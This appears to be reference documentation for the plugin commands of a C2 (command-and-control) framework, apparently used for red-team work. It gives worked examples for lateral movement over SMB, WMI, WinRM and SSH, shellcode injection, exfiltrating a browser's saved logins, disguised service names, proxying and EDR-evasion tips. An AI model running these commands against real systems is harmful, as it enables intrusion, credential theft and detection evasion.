Skip to content

Plugin Commands

Commands delivered as server-side plugins. For execution configuration options (process injection, PPID spoofing, etc.) see Execution Context.

Commercial additions

The commercial payload unlocks additional plugin commands: amsi-bypass, mimikatz, keylogger, load-pe, load-dll, load-elf, screen-tracker, dll-proxy, memory-layout, webcam, kill, and suspend. See commercial plugin commands →

Quick Reference

Command OS Summary
connect-smb Windows Connect to an SMB (bind) agent
connect-tcp Win / Linux / BSD Connect to a TCP bind agent
cp Win / Linux / BSD Copy a file or directory
download Win / Linux / BSD Exfiltrate a file to the C2
execute-assembly Windows Execute a .NET assembly in memory
inject Windows Inject and run shellcode
jump-service Windows Lateral movement via a Windows service
jump-ssh Windows Lateral movement via SSH
jump-winrm Windows Lateral movement via WinRM
jump-wmi Windows Lateral movement via WMI
mkdir Win / Linux / BSD Create a directory
mv Win / Linux / BSD Move or rename a file
portscan Windows TCP port scan with host discovery
procinfo Windows Detailed info about the agent process
rm Win / Linux / BSD Delete a file
rmdir Win / Linux / BSD Delete a directory
rportfwd Win / Linux / BSD Create a reverse port forward through the C2
screenshot Windows Capture the current screen
socks5 Win / Linux / BSD Start a SOCKS5 proxy on the agent network
spawn Windows Spawn a new agent
upload Win / Linux / BSD Write a file to the target filesystem
upload-payload Win / Linux / BSD Write a generated payload to the target filesystem

connect-smb

Purpose: Connects a parent agent to an SMB bind agent, establishing a relayed communication channel.

OS Support: Windows

Parameter Type Required Default Description
host string Yes - IP address or hostname of the target running the SMB agent.
pipename string Yes - Named pipe the SMB agent is listening on.

Example: 

1
connect-smb --host 192.168.1.50 --pipename tuoni_smb

Info

The SMB agent must already be running and listening on the specified pipe before this command is sent. Use upload-payload to stage the agent binary first if needed.

connect-tcp

Purpose: Establishes a connection to a TCP bind agent, making it reachable through the current agent.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
host string Yes - IP address or hostname of the target running the TCP bind agent.
port int Yes - TCP port the bind agent is listening on.

Example: 

1
connect-tcp --host 10.10.10.20 --port 4444

cp

Purpose: Copies a file or directory on the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
source string Yes - Source file or directory path.
destination string Yes - Destination file or directory path.

Example: 

1
cp --source C:\Temp\tool.exe --destination C:\Windows\Temp\svc.exe

download

Purpose: Reads a file from the target filesystem and returns it to the C2 operator.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Path of the file to download. Supports environment variables (e.g. %APPDATA%).

Example: 

1
download --filepath C:\Users\jsmith\AppData\Roaming\Mozilla\Firefox\Profiles\default\logins.json

execute-assembly

Purpose: Loads and executes a .NET assembly (EXE) entirely in memory without writing it to disk.

OS Support: Windows

Parameter Type Required Default Description
@files.executable file Yes - The .NET assembly .exe file to execute.
parameters string No - Command-line arguments to pass to the assembly.

Example: 

1
execute-assembly --@files.executable Seatbelt.exe --parameters "-group=system"

OPSEC

.NET CLR loading is detectable by EDR products monitoring for clr.dll loaded into unusual processes. Configure the Execution Context to control the sacrificial process used for assembly execution.

inject

Purpose: Injects raw shellcode into a process and executes it.

OS Support: Windows

Parameter Type Required Default Description
@files.shellcode file Yes - The raw shellcode binary.

Example: 

1
inject --@files.shellcode beacon.bin

OPSEC

Shellcode injection is one of the most heavily monitored operations by EDR products. Use the Execution Context to configure the injection technique and target process. Run ps first to identify a suitable host process.

jump-service

Purpose: Achieves lateral movement by copying a payload to a remote host and running it as a Windows service.

OS Support: Windows

Parameter Type Required Default Description
payloadId string Yes - ID of the service-executable payload to deploy.
copyMethod string Yes - Method for copying the payload to the target. Options: SMB, NONE.
copyPath string Yes - Full destination path for the copied payload on the remote host.
target string Yes - Target machine IP address or hostname.
servicePath string Yes - Path used when creating the service (should match copyPath).
serviceName string Yes - Internal name of the service to create.
serviceDisplayName string Yes - Display name of the service.
cleanup bool No false Delete the service and binary after execution.
username string No - Username for remote authentication (if not using the current token).
password string No - Password for remote authentication.

Example: 

1
2
3
jump-service --payloadId abc123 --copyMethod SMB --copyPath \\DC01\C$\Windows\Temp\svc.exe
  --target DC01 --servicePath C:\Windows\Temp\svc.exe
  --serviceName TuoniSvc --serviceDisplayName "Windows Update Helper" --cleanup true

Tip

Set cleanup: true for operational security - the service and its binary are removed after the payload executes.

Privileges required

Creating services on a remote host requires administrative privileges. Use token-steal or token-make to obtain appropriate credentials before running this command.

jump-ssh

Purpose: Achieves lateral movement by running commands or staging a payload on a remote host via SSH.

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the payload to deploy. Leave empty to run a command without staging.
copyMethod string No - Copy method. Options: SMB, NONE.
copyPath string No - Destination path on the remote host.
target string Yes - Target machine IP address or hostname.
cmdline string No - Command line to execute on the remote host.
username string Yes - SSH username.
password string No - SSH password (use this or a private key).
@files.privateKeyPEM file No - PEM-encoded private key for key-based authentication.
privateKeyPassword string No - Passphrase for the private key file.

Example: 

1
2
jump-ssh --target 10.10.10.30 --username deploy --@files.privateKeyPEM id_rsa
  --cmdline "/tmp/agent &"

jump-winrm

Purpose: Executes commands or runs an executable on a remote host using Windows Remote Management (WinRM).

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the executable payload to run.
copyMethod string No - Copy method. Options: SMB, NONE.
copyPath string No - Destination path for the payload.
target string Yes - Target machine IP address or hostname.
executablePath string No - Path of the executable to run on the remote host.
customPowershell string No - Custom PowerShell script to execute.
username string No - Username for authentication.
password string No - Password for authentication.

Example: 

1
2
3
jump-winrm --target DC01 --username "CORP\Administrator" --password "P@ssword1"
  --payloadId abc123 --copyMethod SMB --copyPath C:\Windows\Temp\agent.exe
  --executablePath C:\Windows\Temp\agent.exe

Privileges required

WinRM lateral movement requires the target machine to have WinRM enabled and the user to be a member of the Remote Management Users group or a local administrator.

jump-wmi

Purpose: Executes a command or payload on a remote host using Windows Management Instrumentation (WMI).

OS Support: Windows

Parameter Type Required Default Description
payloadId string No - ID of the executable payload to run.
copyMethod string No - Copy method for staging the payload. Options: SMB, NONE.
copyPath string No - Destination path for the staged payload.
target string Yes - Target machine IP address or hostname.
cmdline string No - Command line to execute via WMI.
username string No - Username for remote authentication.
password string No - Password for remote authentication.

Example: 

1
2
3
jump-wmi --target 192.168.1.10 --username "CORP\Administrator" --password "P@ssword1"
  --payloadId abc123 --copyMethod SMB --copyPath C:\Windows\Temp\agent.exe
  --cmdline C:\Windows\Temp\agent.exe

Tip

jump-wmi can use a stolen token - run token-steal first to avoid passing plaintext credentials. See the Lateral Movement use case for a full walkthrough.

mkdir

Purpose: Creates a new directory on the target filesystem, including any missing parent directories.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
dirpath string Yes - Path of the directory to create.

Example: 

1
mkdir --dirpath C:\ProgramData\Updates\cache

mv

Purpose: Moves or renames a file or directory on the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
source string Yes - Source file or directory path.
destination string Yes - Destination path.
overwrite bool No false Allow overwriting the destination if it already exists.

Example: 

1
mv --source C:\Temp\tool.exe --destination C:\Windows\System32\tool.exe --overwrite true

portscan

Purpose: Performs a TCP port scan against one or more hosts, logging discovered hosts and open ports to the Discovery database.

OS Support: Windows

Parameter Type Required Default Description
ips string Yes - IP addresses or CIDR ranges to scan, comma-separated (e.g. 10.0.0.1,10.0.0.0/24).
ports string Yes - Ports or ranges to scan, comma-separated (e.g. 22,80,443,8000-8080).
hostDiscovery string No ICMP Host discovery method before scanning. Options: ICMP, ARP, NONE. Use NONE to skip discovery and assume all hosts are up.
timeout int No 1000 Connection timeout per port in milliseconds.
threads int No 10 Number of concurrent threads for scanning.

Example: 

1
portscan --ips 10.10.10.0/24 --ports 22,80,443,445,3389,8080 --hostDiscovery ICMP --timeout 500 --threads 50

Tip

Discovered hosts and services are automatically added to the Discovery database and visible in the Discovery GUI. Use NONE for hostDiscovery when targeting a specific known host to skip the ping sweep.

procinfo

Purpose: Retrieves additional details about the agent's own process (architecture, integrity level, token info, loaded modules).

OS Support: Windows

Parameters: None

Example: 

1
procinfo

rm

Purpose: Deletes a file from the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Path of the file to delete. Supports environment variables.

Example: 

1
rm --filepath C:\Windows\Temp\agent.exe

rmdir

Purpose: Deletes a directory from the target filesystem, including all contents recursively.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
dirpath string Yes - Path of the directory to delete. Supports recursive deletion.

Example: 

1
rmdir --dirpath C:\ProgramData\Updates\cache

Warning

This deletes the directory and all its contents recursively with no confirmation. Verify the path before running.

rportfwd

Purpose: Creates a reverse port forward on the agent, routing inbound traffic back through the C2 server to a specified host and port.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
bindIp string No 0.0.0.0 IP or interface to listen on within the target network.
bindPort int Yes - Port the agent listens on in the target network.
forwardHost string Yes - Host to forward traffic to (resolved from the Tuoni server).
forwardPort int Yes - Port to forward traffic to.

Example: 

1
rportfwd --bindPort 8080 --forwardHost 192.168.100.5 --forwardPort 80

Info

Traffic arrives at agent:8080 in the target network and is forwarded through the C2 server to 192.168.100.5:80. This allows resources on your operator machine or internal network to be reached from within the target environment.

screenshot

Purpose: Captures the current screen of the target machine and returns the image.

OS Support: Windows

Parameters: None

Example: 

1
screenshot

Tip

For continuous monitoring, use the commercial screen-tracker command, which captures screenshots automatically whenever a specified percentage of the screen changes.

socks5

Purpose: Opens a SOCKS5 proxy listener on the C2 server that routes traffic through the agent's network.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
port int Yes - Port the C2 server opens for the SOCKS5 proxy.

Example: 

1
socks5 --port 1080

Info

After running this command, configure your tools (Proxychains, Burp, etc.) to use 127.0.0.1:1080 (or the C2 server IP) as a SOCKS5 proxy. All traffic is routed through the agent's network interface.

spawn

Purpose: Spawns a new agent using a specified listener payload, optionally with encrypted communication.

OS Support: Windows

Parameter Type Required Default Description
payloadId string Yes - ID of the listener payload to use for the new agent.
encryptedCommunication bool No true Whether the new agent uses encrypted communication.

Example: 

1
spawn --payloadId abc123

upload

Purpose: Writes a file from the operator's machine to the target filesystem.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Destination path on the target. Supports environment variables.
@files.file file Yes - The file content to upload.

Example: 

1
upload --filepath C:\Windows\Temp\nc.exe --@files.file nc64.exe

upload-payload

Purpose: Writes a pre-generated Tuoni payload directly to the target filesystem using its payload ID - no manual file selection needed.

OS Support: Windows, Linux, BSD

Parameter Type Required Default Description
filepath string Yes - Destination path on the target. Supports environment variables.
payloadId string Yes - ID of the payload to write (as shown in the Payloads page).

Example: 

1
upload-payload --filepath C:\Windows\Temp\agent.exe --payloadId abc123

Tip

upload-payload is the preferred way to stage agents for lateral movement commands (jump-wmi, jump-service, etc.) - it avoids handling the binary manually and keeps the payload ID consistent.